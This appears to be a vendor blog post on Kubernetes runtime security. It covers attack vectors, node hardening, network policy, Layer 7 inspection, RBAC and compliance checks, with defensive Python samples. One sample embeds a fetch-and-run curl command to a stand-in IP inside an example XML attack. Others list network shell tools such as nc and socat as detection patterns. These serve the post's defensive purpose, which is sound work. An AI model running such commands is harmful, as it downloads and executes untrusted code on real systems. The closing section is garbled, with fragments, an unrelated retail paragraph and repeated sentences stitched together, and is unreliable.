By Fei Huang and Gary Duan





Containers and tools like Kubernetes enable enterprises to automate many aspects of application deployment, providing tremendous business benefits. But these new deployments are just as vulnerable to attacks and exploits from hackers and insiders as traditional environments, making Kubernetes security a critical component for all deployments. Attacks involving ransomware, crypto mining, data theft, and service disruption will continue to be launched against new container-based virtualized environments in both private and public clouds.

To make matters worse, new tools and technologies like Docker and Kubernetes will themselves be under attack in order to find ways into an enterprise’s prized assets. The recent Kubernetes exploit at Tesla is just the first of many container technology based exploits we will see in the coming months and years.

The hyper-dynamic nature of containers creates the following Kubernetes security challenges:

- Explosion of East-West Traffic. Containers can be dynamically deployed across hosts or even clouds, dramatically increasing the east-west, or internal, traffic that must be monitored for attacks.

- Increased Attack Surface. Each container may have a different attack surface and vulnerabilities which can be exploited. In addition, the attack surface introduced by container orchestration and runtime tools such as Kubernetes and Docker must be considered.

- Automating Security to Keep Pace. Old models and tools for security will not be able to keep up in a constantly changing container environment.

In order to assess the security of your containers during run-time, here are a few security related questions to ask your Kubernetes team:

- Do you have visibility into the Kubernetes pods being deployed? For example, do you know how the application pods or clusters are communicating with each other?

- Do you have a way to detect bad behavior in east/west traffic between containers?

- Are you able to monitor what’s going on inside a pod or container to determine if there is a potential exploit?

- Have you reviewed access rights to the Kubernetes cluster(s) to understand potential insider attack vectors?

For security teams, it’s critical to automate the security process so it doesn’t slow down the DevOps and application development teams. Kubernetes security teams should be able to answer these questions for containerized deployments:

- How can you shorten the security approval process for your developers to get new code into production?

- How do you simplify security alerts and operations team monitoring to pinpoint the most important attacks requiring attention?

- How do you segment particular containers or network connections in a Kubernetes environment?

Before we talk about Kubernetes security, let’s review the basics of what Kubernetes is.

Kubernetes 101

Kubernetes is a container orchestration tool which automates the deployment, update, and monitoring of containers. Kubernetes is supported by all major container management and cloud platforms such as Red Hat OpenShift, Docker EE, Rancher, IBM Cloud, AWS EKS, Azure, SUSE CaaS, and Google Cloud. Here are some of the key things to know about Kubernetes:

- Master Node. The server which manages the Kubernetes worker node cluster and the deployment of pods on nodes.

- Worker Node. Also known as slaves or minions, these servers typically run the application containers and other Kubernetes components such as agents and proxies.

- Pods. The unit of deployment and addressability in Kubernetes. A pod has its own IP address and can contain one or more containers (typically one).

- Services. A service functions as a proxy to its underlying pods and requests can be load balanced across replicated pods.

- System Components. Key components used to manage a Kubernetes cluster include the API Server, Kubelet, and etcd. Each of these components is a potential target for attacks. In fact, the recent Tesla exploit used an unprotected Kubernetes console to install crypto mining software.

Kubernetes Networking Basics

The main concept in Kubernetes networking is that every pod has its own routable IP address. Kubernetes (actually, its network plug-in) takes care of routing all requests internally between hosts to the appropriate pod. External access to Kubernetes pods can be provided through a service, load balancer, or ingress controller, which Kubernetes routes to the appropriate pod.

Pods communicate with each other over the network overlay, and load balancing and DNAT take place to deliver each connection to the right pod. Packets may be encapsulated with additional headers to route them to their destination host, where the encapsulation is removed.

With all of this overlay networking being handled dynamically by Kubernetes, it is extremely difficult to monitor network traffic, much less secure it.
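To make the DNAT and encapsulation steps above concrete, here is a deliberately simplified Python model. The service table, pod-to-node map, and all addresses are hypothetical; in a real cluster this work is done by kube-proxy (iptables or IPVS rules) and the CNI network plug-in, not by application code. The model also hints at why monitoring is hard: between hosts, only the outer node addresses are visible unless a tool decapsulates the traffic.

```python
import random
from dataclasses import dataclass, replace


@dataclass(frozen=True)
class Packet:
    src_ip: str
    dst_ip: str
    dst_port: int
    payload: bytes


@dataclass(frozen=True)
class Encapsulated:
    outer_src: str  # node (host) IP of the sender
    outer_dst: str  # node (host) IP where the destination pod runs
    inner: Packet   # original pod-to-pod packet, carried unchanged


# Hypothetical Service table: (virtual IP, port) -> backend pod (IP, port) pairs
SERVICES = {("10.96.0.10", 80): [("10.244.1.5", 8080), ("10.244.2.7", 8080)]}
# Hypothetical placement of pods on nodes
POD_TO_NODE = {"10.244.1.5": "192.168.0.11", "10.244.2.7": "192.168.0.12"}


def dnat(pkt, rng=random):
    """Rewrite a packet sent to a Service VIP so it targets one backend pod."""
    backends = SERVICES.get((pkt.dst_ip, pkt.dst_port))
    if not backends:
        return pkt  # not a Service address: leave the destination as-is
    ip, port = rng.choice(backends)  # simple random load balancing
    return replace(pkt, dst_ip=ip, dst_port=port)


def encapsulate(pkt, local_node):
    """Wrap a pod-to-pod packet in an outer node-to-node header."""
    return Encapsulated(local_node, POD_TO_NODE[pkt.dst_ip], pkt)


def decapsulate(frame):
    """Strip the outer header on the destination node."""
    return frame.inner
```

For example, `dnat(Packet("10.244.1.9", "10.96.0.10", 80, b"GET /"))` returns a copy addressed to one of the two backend pods, and `encapsulate()` wraps it for delivery to that pod's node, where `decapsulate()` recovers the original packet.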

What to Be Aware Of: Kubernetes Vulnerabilities and Attack Vectors

Attacks on Kubernetes containers running in pods can originate externally through the network or internally by insiders, including victims of phishing attacks whose systems become conduits for insider attacks. Here are a few examples:

- Container compromise. An application misconfiguration or vulnerability enables the attacker to get into a container to start probing for weaknesses in the network, process controls, or file system.

- Unauthorized connections between pods. Compromised containers can attempt to connect with other running pods on the same or other hosts to probe or launch an attack. Although Layer 3 network controls whitelisting pod IP addresses can offer some protection, attacks over trusted IP addresses can only be detected with Layer 7 network filtering.

- Data exfiltration from a pod. Data stealing is often done using a combination of techniques, which can include a reverse shell in a pod connecting to a command/control server and network tunneling to hide confidential data.

The Most Damaging Attacks Have a ‘Kill Chain’

The most damaging attacks often involve a kill chain, or series of malicious activities, which together achieve the attacker's goal. These events can occur rapidly, within a span of seconds, or can be spread out over days, weeks, or even months.

Detecting events in a kill chain requires multiple layers of security monitoring, because different resources are used. The most critical vectors to monitor in order to have the best chances of detection in a production environment include:

- Network inspection. Attackers typically enter through a network connection and expand the attack via the network. The network offers the first opportunity to detect an attack, subsequent opportunities to detect lateral movement, and the last opportunity to catch data stealing activity.

- Container monitoring. An application or system exploit can be detected by monitoring the process, syscall, and file system activity in each container to determine if a suspicious process has started or if attempts are being made to escalate privileges and break out of the container.

- Host security. Here is where traditional host (endpoint) security can be useful to detect exploits against the kernel or system resources. However, host security tools must also be Kubernetes and container aware to ensure adequate coverage.
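One way to reason about correlating these vectors is to group events per pod and look for several vectors firing close together in time. The sketch below assumes a hypothetical event format (timestamp, pod, vector, detail) emitted by separate network, container, and host sensors; because kill chains can unfold over seconds or months, the window size is a tuning assumption, not a recommendation.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    ts: float    # seconds since some reference time
    pod: str
    vector: str  # "network", "container", or "host"
    detail: str


def find_kill_chains(events, window_s=3600.0, min_vectors=2):
    """Map each suspicious pod to the first run of its events that spans at
    least `min_vectors` distinct vectors within `window_s` seconds."""
    by_pod = defaultdict(list)
    for ev in events:
        by_pod[ev.pod].append(ev)

    suspects = {}
    for pod, evs in by_pod.items():
        evs.sort(key=lambda e: e.ts)
        start = 0
        for end in range(len(evs)):
            # Slide the window start forward until it spans at most window_s.
            while evs[end].ts - evs[start].ts > window_s:
                start += 1
            chain = evs[start:end + 1]
            if len({e.vector for e in chain}) >= min_vectors:
                suspects[pod] = chain
                break
    return suspects
```

A single network alert on its own stays below the threshold; a network alert followed shortly by a reverse shell in the same pod is reported as one correlated chain.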

In addition to the vectors above, attackers can also attempt to compromise deployment tools such as the Kubernetes API Server or console to gain access to secrets or be able to take control of running pods.

Attacks on the Kubernetes Infrastructure Itself

In order to disable or disrupt applications or gain access to secrets, resources, or containers, hackers can also attempt to compromise Kubernetes resources such as the API Server or Kubelets. The recent Tesla hack exploited an unprotected console to gain access to the underlying infrastructure and run crypto mining software.

For example, an attacker who steals an API Server token, or steals a user's identity and impersonates that authorized user to access the database, can deploy malicious containers or stop critical applications from running.

By attacking the orchestration tools themselves, hackers can disrupt running applications and even gain control of the underlying resources used to run containers. In Kubernetes there have been some published privilege escalation paths, via the Kubelet, etcd access, or service tokens, which can enable an attacker to gain cluster admin privileges from a compromised container.

Preparing Kubernetes Worker Nodes for Production

Before deploying any application containers, the host systems for the Kubernetes worker nodes should be locked down. Here are the most effective ways to lock down the hosts.

Recommended Pre-Deployment Security Steps

- Use namespaces

- Restrict Linux capabilities

- Enable SELinux

- Utilize Seccomp

- Configure Cgroups

- Use R/O Mounts

- Use a minimal Host OS

- Update system patches

- Run CIS Benchmark security tests
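Several of the container-level items in this list map directly onto fields in a Kubernetes Pod spec. The sketch below builds such a manifest as a Python dict and prints it as JSON, which `kubectl apply -f -` accepts on standard input. The pod name, image, namespace, resource limits, and SELinux label are placeholder assumptions; host-level steps (minimal OS, patching, CIS benchmarks) are outside the scope of a pod spec, and `runAsNonRoot` requires an image that runs as a non-root user.

```python
import json


def hardened_pod(name, namespace, image):
    """Return a Pod manifest (as a dict) applying several pre-deployment controls."""
    return {
        "apiVersion": "v1",
        "kind": "Pod",
        "metadata": {"name": name, "namespace": namespace},  # use namespaces
        "spec": {
            # Don't mount an API token into pods that never call the API Server.
            "automountServiceAccountToken": False,
            "securityContext": {
                "runAsNonRoot": True,  # image must run as a non-root UID
                "seccompProfile": {"type": "RuntimeDefault"},  # utilize Seccomp
                # Only takes effect on hosts with SELinux enabled; example label.
                "seLinuxOptions": {"level": "s0:c123,c456"},
            },
            "containers": [{
                "name": name,
                "image": image,
                "securityContext": {
                    "allowPrivilegeEscalation": False,
                    "readOnlyRootFilesystem": True,  # R/O root filesystem
                    "capabilities": {"drop": ["ALL"]},  # restrict Linux capabilities
                },
                # Requests/limits are enforced through cgroups on the node.
                "resources": {
                    "requests": {"cpu": "100m", "memory": "128Mi"},
                    "limits": {"cpu": "500m", "memory": "256Mi"},
                },
            }],
        },
    }


if __name__ == "__main__":
    # Pipe the output to: kubectl apply -f -
    print(json.dumps(hardened_pod("api", "shop", "registry.example.com/shop/api:1.4"), indent=2))
```

Dropping all capabilities and then adding back only what a workload proves it needs is usually easier to audit than starting from the default set.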

Real-Time, Run-Time Kubernetes Security





Once containers are running in production, the three critical security vectors for protecting them are network filtering, container inspection, and host security.

Inspect and Secure the Network

A container firewall is a new type of network security product which applies traditional network security techniques to the new cloud-native Kubernetes environment. There are different approaches to securing a container network with a firewall, including:

- Layer 3/4 filtering, based on IP addresses and ports. This approach includes Kubernetes network policy, which updates rules dynamically to protect deployments as they change and scale. Simple network segmentation rules are not designed to provide the robust monitoring, logging, and threat detection required for business critical container deployments, but they can provide some protection against unauthorized connections.

- Web application firewall (WAF) attack detection can protect web-facing containers (typically HTTP-based applications) using methods that detect common attacks, similar to the functionality of traditional web application firewalls. However, the protection is limited to external attacks over HTTP, and lacks the multi-protocol filtering often needed for internal traffic.

- Layer-7 container firewall. A container firewall with Layer 7 filtering and deep packet inspection of inter-pod traffic secures containers using network application protocols. Protection is based on application protocol whitelists as well as built-in detection of common network-based application attacks such as DDoS, DNS attacks, and SQL injection. Container firewalls are also in a unique position to incorporate container process monitoring and host security into the threat vectors monitored.
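For the Layer 3/4 approach, Kubernetes NetworkPolicy is the built-in mechanism. A common pattern is a default-deny ingress policy for a namespace plus narrow allow rules. The namespace, `app` labels, and port below are hypothetical, and the policies are only enforced if the cluster's network plug-in supports NetworkPolicy. These rules match pods and ports only; they cannot see what is inside an allowed connection.

```python
import json


def default_deny_ingress(namespace):
    """Select every pod in the namespace and allow no ingress traffic."""
    return {
        "apiVersion": "networking.k8s.io/v1",
        "kind": "NetworkPolicy",
        "metadata": {"name": "default-deny-ingress", "namespace": namespace},
        "spec": {"podSelector": {}, "policyTypes": ["Ingress"]},
    }


def allow_ingress(namespace, to_app, from_app, port):
    """Allow TCP `port` into pods labelled app=to_app, only from app=from_app."""
    return {
        "apiVersion": "networking.k8s.io/v1",
        "kind": "NetworkPolicy",
        "metadata": {"name": f"allow-{from_app}-to-{to_app}", "namespace": namespace},
        "spec": {
            "podSelector": {"matchLabels": {"app": to_app}},
            "policyTypes": ["Ingress"],
            "ingress": [{
                "from": [{"podSelector": {"matchLabels": {"app": from_app}}}],
                "ports": [{"protocol": "TCP", "port": port}],
            }],
        },
    }


# Hypothetical example: only the "api" pods may reach the "db" pods on 5432.
manifest = {
    "apiVersion": "v1",
    "kind": "List",
    "items": [default_deny_ingress("shop"), allow_ingress("shop", "db", "api", 5432)],
}

if __name__ == "__main__":
    print(json.dumps(manifest, indent=2))  # e.g. pipe to: kubectl apply -f -
```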

Deep packet inspection (DPI) techniques are essential for in-depth network security in a container firewall. Exploits typically use predictable attack vectors, such as malicious HTTP requests with a malformed header, or an executable shell command embedded within an Extensible Markup Language (XML) object. Layer 7 DPI can look for and recognize these methods. Container firewalls using these techniques can determine whether each pod connection should be allowed through or is a possible attack that should be blocked.
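The toy sketch below illustrates the difference between an IP allowlist and Layer 7 inspection for the two attack patterns just mentioned. The regular expressions are simplified, hypothetical signatures written for this example, not rules from any DPI product; a real engine fully parses each protocol. The point is the contrast: the request comes from a trusted pod IP, so a Layer 3 check admits it, while payload inspection flags it.

```python
import re

# Simplified, hypothetical signatures for the two patterns described above.
REQUEST_LINE = re.compile(r"^[A-Z]+ \S+ HTTP/1\.[01]$")
HEADER_LINE = re.compile(r"^[!#$%&'*+.^_`|~0-9A-Za-z-]+:[ \t]*[^\r\n]*$")
SHELL_IN_XML = re.compile(r"<[^>]+>[^<]*(\$\(|`|;\s*(sh|bash|nc|curl|wget)\b)", re.I)

# Hypothetical Layer 3 allowlist: pod IPs permitted to reach this service.
TRUSTED_SOURCES = {"10.244.1.5"}


def l3_allows(src_ip):
    """Layer 3 check: only looks at where the connection comes from."""
    return src_ip in TRUSTED_SOURCES


def l7_inspect(raw):
    """Layer 7 check on one HTTP/1.x request: 'allow' or a reason to block."""
    head, _, body = raw.decode("latin-1").partition("\r\n\r\n")
    request_line, *headers = head.split("\r\n")
    if not REQUEST_LINE.match(request_line):
        return "block: malformed request line"
    for line in headers:
        if not HEADER_LINE.match(line):
            return f"block: malformed header {line!r}"
    if SHELL_IN_XML.search(body):
        return "block: shell command inside XML element"
    return "allow"


attack = (b"POST /orders HTTP/1.1\r\nHost: api\r\nContent-Type: application/xml\r\n\r\n"
          b"<order><id>42; curl http://198.51.100.7/x.sh | sh</id></order>")
print(l3_allows("10.244.1.5"), l7_inspect(attack))
# prints: True block: shell command inside XML element
```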

Given the dynamic nature of containers and the Kubernetes networking model, traditional tools for network visibility, forensics, and analysis can't be used. Simple tasks such as packet captures for debugging applications or investigating security events are no longer simple. New Kubernetes and container aware tools are needed to perform network security, inspection, and forensic tasks.

Container Inspection

Attacks frequently use privilege escalations and malicious processes to carry out or spread an attack. Exploits of vulnerabilities in the Linux kernel (such as Dirty COW), packages, libraries, or applications themselves can result in suspicious activity within a container.

Inspecting container processes and file system activity and detecting suspicious behavior is a critical element of container security. Suspicious processes such as port scanning and reverse shells, or privilege escalations should all be detected. There should be a combination of built-in detection as well as a baseline behavioral learning process which can identify unusual processes based on previous activity.

If containerized applications are designed with microservices principles in mind, where each application in a container has a limited set of functions and the container is built with only the required packages and libraries, detecting suspicious processes and file system activity is much easier and more accurate.
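A minimal sketch of the "built-in rules plus learned baseline" approach, assuming a hypothetical feed of (image, process name) observations from a container runtime monitor. It keys the baseline by image, which works best when containers follow the microservices principles just described and run only a few processes. The list of suspicious binaries is an illustrative assumption.

```python
from collections import defaultdict

# Illustrative built-in rule: tools rarely needed inside an application container.
BUILTIN_SUSPICIOUS = {"nmap", "masscan", "nc", "ncat", "socat"}


class ProcessBaseline:
    """Learn which processes each image normally runs, then flag deviations."""

    def __init__(self):
        self.learned = defaultdict(set)  # image -> process names seen while learning
        self.learning = True

    def observe(self, image, process):
        """Return None if the process looks normal, otherwise a reason string."""
        if process in BUILTIN_SUSPICIOUS:
            return f"built-in rule: {process} started in {image}"
        if self.learning:
            self.learned[image].add(process)
            return None
        if process not in self.learned.get(image, set()):
            return f"not in baseline: {process} started in {image}"
        return None


if __name__ == "__main__":
    b = ProcessBaseline()
    for proc in ("python3", "gunicorn"):
        b.observe("shop/api:1.4", proc)  # learning phase
    b.learning = False                   # switch to detection
    print(b.observe("shop/api:1.4", "gunicorn"))  # None
    print(b.observe("shop/api:1.4", "bash"))      # not in baseline: bash started in shop/api:1.4
```

Built-in rules fire even during learning, so a compromise that happens before the baseline is complete is not silently learned as "normal" for the listed tools.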

Host Security

If the host (e.g. Kubernetes worker node) on which containers run is compromised, all kinds of bad things can happen. These include:

- Privilege escalations to root

- Stealing of secrets used for secure application or infrastructure access

- Changing of cluster admin privileges

- Host resource damage or hijacking (e.g. crypto mining software)

- Stopping of critical orchestration tool infrastructure such as the API Server or the Docker daemon

- Starting of suspicious processes mentioned in the Container Inspection section above

Like containers, the host system needs to be monitored for these suspicious activities. Because containers can run operating systems and applications just like the host, monitoring container processes and file system activity requires the same security functions as monitoring hosts. Together, the combination of network inspection, container inspection, and host security offers the best way to detect a kill chain from multiple vectors.

Securing the Kubernetes System and Resources

Orchestration tools such as Kubernetes, and the management platforms built on top of them, can be vulnerable to attacks if not protected. They introduce attack surfaces that did not previously exist in container deployments, and hackers will attempt to exploit them. The recent Tesla hack and Kubelet exploit are just the start of the continuing cycle of exploit and patch that can be expected for new technologies.

In order to protect Kubernetes and management platforms themselves from attacks, it's critical to properly configure role-based access control (RBAC) for system resources. Here are the areas to review and configure for proper access controls.

- Protect the API Server. Configure RBAC for the API Server or manually create firewall rules to prevent unauthorized access.

- Restrict Kubelet Permissions. Configure RBAC for Kubelets and manage certificate rotation to secure the Kubelet.

- Require Authentication for All External Ports. Review all externally accessible ports and remove unnecessary ones. Require authentication for the external ports that are needed. For non-authenticated services, restrict access to whitelisted sources.

- Limit or Remove Console Access. Don’t allow console/proxy access unless properly configured for user login with strong passwords or two-factor authentication.
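As a sketch of what least privilege looks like in practice, the Python below builds a read-only RBAC Role and RoleBinding and audits a Kubelet configuration for the settings mentioned in this list. Field names follow the Kubernetes RBAC API and the `KubeletConfiguration` file format; the namespace, role, and user names are hypothetical. Because defaults differ between Kubelet command-line flags and config-file versions, the audit treats any missing setting as insecure.

```python
RBAC_GROUP = "rbac.authorization.k8s.io"


def read_only_pods_role(namespace, name="pod-reader"):
    """A namespaced Role that can only read pods: no create, update, or delete."""
    return {
        "apiVersion": f"{RBAC_GROUP}/v1",
        "kind": "Role",
        "metadata": {"name": name, "namespace": namespace},
        "rules": [{"apiGroups": [""], "resources": ["pods"],
                   "verbs": ["get", "list", "watch"]}],
    }


def bind_role_to_user(namespace, role, user):
    """Grant an existing Role to a single user within one namespace."""
    return {
        "apiVersion": f"{RBAC_GROUP}/v1",
        "kind": "RoleBinding",
        "metadata": {"name": f"{role}-{user}", "namespace": namespace},
        "subjects": [{"kind": "User", "name": user, "apiGroup": RBAC_GROUP}],
        "roleRef": {"kind": "Role", "name": role, "apiGroup": RBAC_GROUP},
    }


def audit_kubelet_config(cfg):
    """Return findings for a KubeletConfiguration given as a dict.
    Missing settings are treated as insecure."""
    findings = []
    if cfg.get("authentication", {}).get("anonymous", {}).get("enabled", True):
        findings.append("anonymous requests to the Kubelet API are allowed")
    if cfg.get("authorization", {}).get("mode") != "Webhook":
        findings.append("Kubelet does not delegate authorization to the API Server")
    if not cfg.get("rotateCertificates", False):
        findings.append("Kubelet client certificate rotation is disabled")
    # Assume the legacy read-only port 10255 is open unless explicitly set to 0.
    if cfg.get("readOnlyPort", 10255) != 0:
        findings.append("unauthenticated read-only port is enabled")
    return findings
```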

When combined with robust host security as discussed before for locking down the worker nodes, the Kubernetes deployment infrastructure can be protected from attacks. However, monitoring tools should also be used to track access to infrastructure services to detect unauthorized connection attempts and potential attacks.

For example, in the Tesla Kubernetes console exploit, once access to worker nodes was compromised, hackers created an external connection to China to control crypto mining software. Real-time, policy based monitoring of the containers, hosts, network and system resources would have detected suspicious processes as well as unauthorized external connections.
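Detecting the kind of unauthorized external connection described above can start with something as simple as an egress allowlist. The sketch assumes a hypothetical feed of (pod, destination IP) pairs from a network monitor; the allowed ranges are example networks (203.0.113.0/24 is reserved for documentation) and would be replaced with the destinations each workload actually needs.

```python
import ipaddress

# Hypothetical allowlist: a private in-cluster range plus one placeholder
# partner range (203.0.113.0/24 is a documentation-only network).
ALLOWED_EGRESS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "203.0.113.0/24")]


def unauthorized_egress(connections):
    """Yield (pod, destination) pairs whose destination is not allowlisted."""
    for pod, dst in connections:
        addr = ipaddress.ip_address(dst)
        if not any(addr in net for net in ALLOWED_EGRESS):
            yield pod, dst


if __name__ == "__main__":
    seen = [("web-1", "10.1.2.3"), ("web-1", "203.0.113.20"), ("worker-7", "198.51.100.7")]
    for pod, dst in unauthorized_egress(seen):
        print(f"ALERT: {pod} connected to non-allowlisted {dst}")
```

On its own this only raises an alert; pairing it with the process context from container inspection (which binary opened the connection) is what turns it into evidence of something like a crypto miner.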

Auditing and Compliance for Kubernetes Environments

With the rapid evolution of container technology and tools such as Kubernetes, enterprises will be constantly updating, upgrading, and migrating the container environment. Running a set of security tests designed for Kubernetes environments will ensure that security does not regress with each change. As more enterprises migrate to containers, the changes in the infrastructure, tools, and topology may also require re-certification for compliance standards like PCI.

Fortunately, there is already a comprehensive set of Kubernetes security and Docker security checks through the CIS Benchmarks for Kubernetes and the Docker Bench tests. Running these tests regularly and confirming the expected results should be automated.

These tests focus on the following areas:

- Host security

- Kubernetes security

- Docker daemon security

- Container security

- Properly configured RBACs

- Securing data at rest and in transit
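Automating these checks mostly comes down to comparing each run against a known-good baseline so that regressions stand out. The sketch below assumes the benchmark results have already been exported as JSON objects mapping check IDs to `PASS`, `FAIL`, or `WARN`; that format, and the file paths passed to `gate()`, are assumptions for illustration, not the native output of any particular benchmark tool.

```python
import json


def load_results(path):
    """Load benchmark results: a JSON object mapping check ID -> status."""
    with open(path) as f:
        return json.load(f)


def regressions(baseline, current):
    """Check IDs that passed in the baseline but do not pass now (or are missing)."""
    return sorted(cid for cid, status in baseline.items()
                  if status == "PASS" and current.get(cid) != "PASS")


def gate(baseline_path, current_path):
    """Print regressions and return a CI-style exit code (0 = no regressions)."""
    bad = regressions(load_results(baseline_path), load_results(current_path))
    for cid in bad:
        print(f"REGRESSION: check {cid} no longer passes")
    return 1 if bad else 0
```

In a pipeline, `sys.exit(gate("baseline.json", "latest.json"))` would fail the job whenever a previously passing check regresses, which is how security avoids silently slipping with each upgrade or migration.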

Vulnerability scanning of images and containers in registries and in production is also a core component for preventing known exploits and achieving compliance. However, vulnerability scanning alone cannot provide the multiple vectors of security needed to protect container runtime deployments.

To learn how to automate security into your Build, Ship, Run processes, see this post on Continuous Container Security.

Run-Time Kubernetes Security – The NeuVector Multi-Vector Container Firewall

Orchestration and container management tools are not designed to be security tools, even though they provide basic RBACs and infrastructure security features. For business critical deployments, specialized Kubernetes security tools are needed for run-time protection. Specifically, a security solution should address security concerns across the three primary security vectors: network, container and host.

NeuVector is a highly integrated, automated security solution for Kubernetes, with the following features:

- Multi-vector container security addressing the network, container, and host.

- Layer 7 container firewall to protect east-west and ingress/egress traffic.

- Container inspection for suspicious activity.

- Host security for detecting system exploits.

- Automated policy and adaptive enforcement to auto-protect and auto-scale.

- Run-time vulnerability scanning for any container or host in the Kubernetes cluster.

- Compliance and auditing through CIS security benchmarks.

The NeuVector solution is a container itself which is deployed and updated with Kubernetes or any orchestration system you use such as OpenShift, Rancher, Docker EE, IBM Cloud, SUSE CaaS, EKS etc. To learn more, please request a demo of NeuVector.

Open Source Kubernetes Security Tools

While commercial tools like the NeuVector container firewall offer multi-vector protection and visibility, there are open source projects which continue to evolve to add security features. Here are some to consider for projects that are less business critical in production.

- Network Policy. Kubernetes Network Policy provides automated segmentation by IP address.

- Istio. Istio creates a service mesh for managing service-to-service communication, including routing, authentication, and encryption, but is not designed to be a security tool to detect attacks and threats.

- Grafeas. Grafeas provides a tool to define a uniform way for auditing and governing the modern software supply chain.

- Clair. Clair is a simple tool for vulnerability scanning of images, but lacks registry integration and workflow support.

- Kubernetes CIS Benchmark. The compliance and auditing checks from the CIS Benchmark for Kubernetes Security are available to use. The NeuVector implementation of these 100+ tests is available here.

Don’t Wait Until You’re In Production – Deploy Kubernetes with Confidence, Securely

The rapid pace of application deployment and the highly automated run-time environment enabled by tools like Kubernetes make it critical to consider run-time Kubernetes security automation for all business critical applications. It's not enough to scan images in registries and harden containers and hosts for run-time. Staying out of the latest data breach, ransomware, and Kubernetes exploit headlines requires a layered security strategy which covers as many threat vectors as possible.

It’s not enough to scan images in registries and harden containers and hosts for run-time. Staying out of the latest data breach, ransomware, and Kubernetes exploit headlines requires a layered security strategy which covers as many threat vectors as possible.



ve done it! After doing your homework, you’ve decided to move your business to a private cloud and you’ve made the smart choice by choosing





ve done it! After doing your homework, you’ve decided to move your business to a private cloud and you’ve made the smart choice by choosing  The plethora of challenges confronting the retailers, in this post-Amazon era, have made it incumbent upon these retailers to transform their business models, in order to generate sustainable growth. Customer preferences and shopping behavior have been evolving at a frantic pace. This new channel-agnostic customer expects the shopping experience to be personalized and seamless across the different points of engagement which the retailer has to offer. The leading retailers are embracing this change. They are adapting their business processes and IT infrastructure to serve the needs of this evolving customer.

The plethora of challenges confronting the retailers, in this post-Amazon era, have made it incumbent upon these retailers to transform their business models, in order to generate sustainable growth. Customer preferences and shopping behavior have been evolving at a frantic pace. This new channel-agnostic customer expects the shopping experience to be personalized and seamless across the different points of engagement which the retailer has to offer. The leading retailers are embracing this change. They are adapting their business processes and IT infrastructure to serve the needs of this evolving customer.

Containers and tools like Kubernetes enable enterprises to automate many aspects of application deployment, providing tremendous business benefits. But these new deployments are just as vulnerable to attacks and exploits from hackers and insiders as traditional environments, making Kubernetes security a critical component for all deployments. Attacks for ransomware, crypto mining, data stealing and service disruption will continue to be launched against new container based virtualized environments in both private and public clouds.

Containers and tools like Kubernetes enable enterprises to automate many aspects of application deployment, providing tremendous business benefits. But these new deployments are just as vulnerable to attacks and exploits from hackers and insiders as traditional environments, making Kubernetes security a critical component for all deployments. Attacks for ransomware, crypto mining, data stealing and service disruption will continue to be launched against new container based virtualized environments in both private and public clouds. The most damaging attacks often involve a kill chain, or series of malicious activities, which together achieve the attackers goal. These events can occur rapidly, within a span of seconds, or can be spread out over days, weeks or even months.

The most damaging attacks often involve a kill chain, or series of malicious activities, which together achieve the attackers goal. These events can occur rapidly, within a span of seconds, or can be spread out over days, weeks or even months. NeuVector is a highly integrated, automated security solution for Kubernetes, with the following features:

NeuVector is a highly integrated, automated security solution for Kubernetes, with the following features: It’s not enough to scan images in registries and harden containers and hosts for run-time. Staying out of the latest data breach, ransomware, and Kubernetes exploit headlines requires a layered security strategy which covers as many threat vectors as possible.

It’s not enough to scan images in registries and harden containers and hosts for run-time. Staying out of the latest data breach, ransomware, and Kubernetes exploit headlines requires a layered security strategy which covers as many threat vectors as possible.